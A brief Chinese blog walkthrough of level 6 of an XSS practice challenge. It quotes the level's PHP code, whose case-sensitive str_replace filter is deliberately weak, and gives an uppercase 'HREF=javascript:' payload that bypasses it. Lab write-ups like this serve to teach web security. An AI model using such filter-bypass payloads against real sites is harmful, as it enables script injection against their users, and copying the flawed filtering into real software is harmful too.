XXS level6
作者:互联网
(1输入框输入与第五关 相同的payload
查看页面源代码,发现“href"变成了”hr_ef“
(2)查看PHP源代码
<?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str2=str_replace("<script","<scr_ipt",$str); $str3=str_replace("on","o_n",$str2); $str4=str_replace("src","sr_c",$str3); $str5=str_replace("data","da_ta",$str4); $str6=str_replace("href","hr_ef",$str5); echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level6.php method=GET> <input name=keyword value="'.$str6.'"> <input type=submit name=submit value=搜索 /> </form> </center>'; ?> <center><img src=level6.png></center> <?php
发现"<script"、"on"、"src"、"data"、"href"都被加了下划线。
(2)可以采用大写避过过滤,payload如下:
"><A HREF="javascript:alert()">
标签:XXS,查看,ef,输入框,href,level6,源代码,payload 来源: https://www.cnblogs.com/momoli/p/10586004.html